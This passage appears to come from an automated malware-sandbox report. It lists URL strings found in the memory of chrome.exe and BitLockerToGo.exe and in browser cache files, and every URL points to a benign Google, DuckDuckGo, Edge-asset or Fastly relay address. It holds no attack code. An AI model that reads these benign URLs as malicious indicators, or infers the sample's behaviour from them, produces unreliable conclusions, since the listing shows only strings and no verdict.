                  Source: chrome.exe, 00000007.00000003.2013025564.00005AF001C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2013070357.00005AF001C60000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/document/
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview2K
                  Source: chrome.exe, 00000007.00000003.2013025564.00005AF001C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2013070357.00005AF001C60000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/document/dogl
                  Source: chrome.exe, 00000007.00000003.2013025564.00005AF001C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2013070357.00005AF001C60000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/document/njb
                  Source: chromecache_477.9.dr | String found in binary or memory: https://domains.google.com/suggest/flow
                  Source: chrome.exe, 00000007.00000003.1967600922.00005AF0004DC000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.12.dr | String found in binary or memory: https://drive-autopush.corp.google.com/
                  Source: chrome.exe, 00000007.00000003.1967600922.00005AF0004DC000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.12.dr | String found in binary or memory: https://drive-daily-0.corp.google.com/
                  Source: chrome.exe, 00000007.00000003.1967600922.00005AF0004DC000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.12.dr | String found in binary or memory: https://drive-daily-1.corp.google.com/
                  Source: chrome.exe, 00000007.00000003.1967600922.00005AF0004DC000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.12.dr | String found in binary or memory: https://drive-daily-2.corp.google.com/
                  Source: chrome.exe, 00000007.00000003.1967600922.00005AF0004DC000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.12.dr | String found in binary or memory: https://drive-daily-3.corp.google.com/
                  Source: chrome.exe, 00000007.00000003.1967600922.00005AF0004DC000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.12.dr | String found in binary or memory: https://drive-daily-4.corp.google.com/
                  Source: chrome.exe, 00000007.00000003.1967600922.00005AF0004DC000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.12.dr | String found in binary or memory: https://drive-daily-5.corp.google.com/
                  Source: chrome.exe, 00000007.00000003.1967600922.00005AF0004DC000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.12.dr | String found in binary or memory: https://drive-daily-6.corp.google.com/
                  Source: chrome.exe, 00000007.00000003.1967600922.00005AF0004DC000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.12.dr | String found in binary or memory: https://drive-preprod.corp.google.com/
                  Source: chrome.exe, 00000007.00000003.1967600922.00005AF0004DC000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.12.dr | String found in binary or memory: https://drive-staging.corp.google.com/
                  Source: chrome.exe, 00000007.00000003.1976735759.00005AF001278000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
                  Source: chrome.exe, 00000007.00000003.1967600922.00005AF0004DC000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.12.dr | String found in binary or memory: https://drive.google.com/
                  Source: chrome.exe, 00000007.00000003.2039230488.00005AF000C50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/?q=
                  Source: BitLockerToGo.exe, 00000003.00000002.2653431701.0000000005528000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2653431701.000000000564E000.00000004.00000020.00020000.00000000.sdmp, zmglfu.3.dr, 3ozmoz.3.dr, Web Data.12.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: BitLockerToGo.exe, 00000003.00000002.2653431701.0000000005528000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2653431701.000000000564E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2039230488.00005AF000C50000.00000004.00000800.00020000.00000000.sdmp, zmglfu.3.dr, 3ozmoz.3.dr, Web Data.12.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: chrome.exe, 00000007.00000003.2039230488.00005AF000C50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.ico
                  Source: BitLockerToGo.exe, 00000003.00000002.2653431701.0000000005528000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2653431701.000000000564E000.00000004.00000020.00020000.00000000.sdmp, zmglfu.3.dr, 3ozmoz.3.dr, Web Data.12.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: chrome.exe, 00000007.00000003.2039230488.00005AF000C50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icondTripTime
                  Source: 000003.log6.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
                  Source: 000003.log6.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
                  Source: 000003.log7.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtrac
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_163_music.png/1.0.3/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr, HubApps Icons.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr, HubApps Icons.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr, HubApps Icons.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_facebook_messenger.png/1.5.14/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gaana.png/1.0.3/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr, HubApps Icons.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gmail.png/1.5.4/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_iHeart.png/1.0.3/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_instagram.png/1.4.13/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_ku_gou.png/1.0.3/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_last.png/1.0.3/asset
                  Source: 000003.log6.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_naver_vibe.png/1.0.3/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr, HubApps Icons.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_qq.png/1.0.3/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr, HubApps Icons.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr, HubApps Icons.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_sound_cloud.png/1.0.3/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_dark.png/1.2.19/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_hc.png/1.2.19/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_light.png/1.2.19/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_telegram.png/1.0.4/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tidal.png/1.0.3/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr, HubApps Icons.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whatsapp_light.png/1.4.11/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_youtube.png/1.4.14/asset
                  Source: 000003.log6.12.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/signal_triggers/1.13.3/asset?sv=2017-07-29&sr=c&sig=Nt
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://excel.new?from=EdgeM365Shoreline
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr | String found in binary or memory: https://gaana.com/
                  Source: chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1999978519.0000244000974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1963750620.000024400071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1963873511.0000244000728000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/A
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/D
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/E
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/K
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/N
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/O
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/R
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/U
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Y
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/b
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/c
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/f
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/i
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/j
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/l
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/m
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/p
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/q
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/s
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/t
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/v
